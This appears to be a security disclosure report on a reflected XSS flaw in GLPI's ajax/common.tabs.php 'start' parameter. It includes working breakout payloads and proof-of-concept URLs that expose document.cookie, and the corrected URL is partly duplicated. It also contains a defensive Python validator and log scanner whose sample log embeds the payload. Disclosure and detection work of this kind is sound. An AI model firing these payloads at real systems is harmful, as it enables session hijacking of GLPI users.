Authenticated Reflected XSS on ajax/common.tabs.php in glpi-project/glpi
Reported on Dec 12th 2022
Description
There is a reflected XSS vulnerability on ajax/common.tabs.php because the KnowBase tab does not escape the start parameter properly (probably because it is not reflected inside quotes).
Some work was needed to get the exploit working, because jQuery's $() was not defined and caused a ReferenceError. This could be bypassed by redefining a function with the same name that does nothing and then proceeding to write the payload after it. After some tweaking, the payload looked like this:
1})}});alert(document.cookie);(function a(){function b(){(function c(){
Proof-of-Concept (PoC)
This PoC will trigger an alert containing the browser cookies.
http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);(function%20a(){function%20b(){(function%20c(){
Impact
An attacker can persuade a victim into opening a URL containing a payload exploiting this vulnerability. After exploited, the attacker can make actions as the victim or exfiltrate session cookies.
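The root cause above is a paging offset that should only ever be a digit string being reflected unescaped into a script context. The following is an added example (not GLPI's code and not from the report): it applies that digit-only rule both as the server-side acceptance check and as a detection over constructed access-log lines, where the second line reuses the payload shape from the report; the log format and IPs are assumptions.

```python
# Added example (not GLPI code): flag ajax/common.tabs.php requests whose `start`
# parameter is not a plain integer, the shape the report's payload abuses.
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/ajax/common.tabs.php"
INT_RE = re.compile(r"^\d+$")  # the only shape a paging offset should have
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed access-log lines; the second reuses the report's payload shape.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2022:10:00:01 +0000] "GET /ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=0 HTTP/1.1" 200 512
10.0.0.9 - - [12/Dec/2022:10:00:07 +0000] "GET /ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);function%20$(a){};(function%20a(){function%20b(){(function%20c(){ HTTP/1.1" 200 734
10.0.0.7 - - [12/Dec/2022:10:00:09 +0000] "GET /front/central.php?start=abc HTTP/1.1" 200 2048
"""


def start_values(target):
    """Decoded `start=` values from the request target. Split by hand so the
    `;` inside a JavaScript payload is never treated as a parameter separator."""
    values = []
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "start":
            values.append(unquote_plus(value))
    return values


def safe_start(raw):
    """Server-side rule: accept a digit string, reject everything else."""
    if not INT_RE.match(raw):
        raise ValueError(f"start must be a non-negative integer, got {raw!r}")
    return int(raw)


def is_suspicious(target):
    """True when the vulnerable endpoint is hit with a non-integer `start`."""
    if urlsplit(target).path != TARGET_PATH:
        return False
    return any(not INT_RE.match(v) for v in start_values(target))


def scan_log(log_text):
    """Client IPs of log lines whose request is suspicious."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append(line.split(" ", 1)[0])
    return hits
```

Running scan_log(SAMPLE_LOG) flags only the second line; the third line has a non-integer start but targets a different endpoint, so it is ignored.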
I have provided the wrong PoC. The following PoC includes the undefined jQuery bypass.
http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);function%20$(a){};(function%20a(){function%20b(){(function%20c(){
@admin, we reevaluated the severity to 4.8 (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N). Could you please change this?
https://github.com/glpi-project/glpi/security/advisories/GHSA-352j-wr38-493c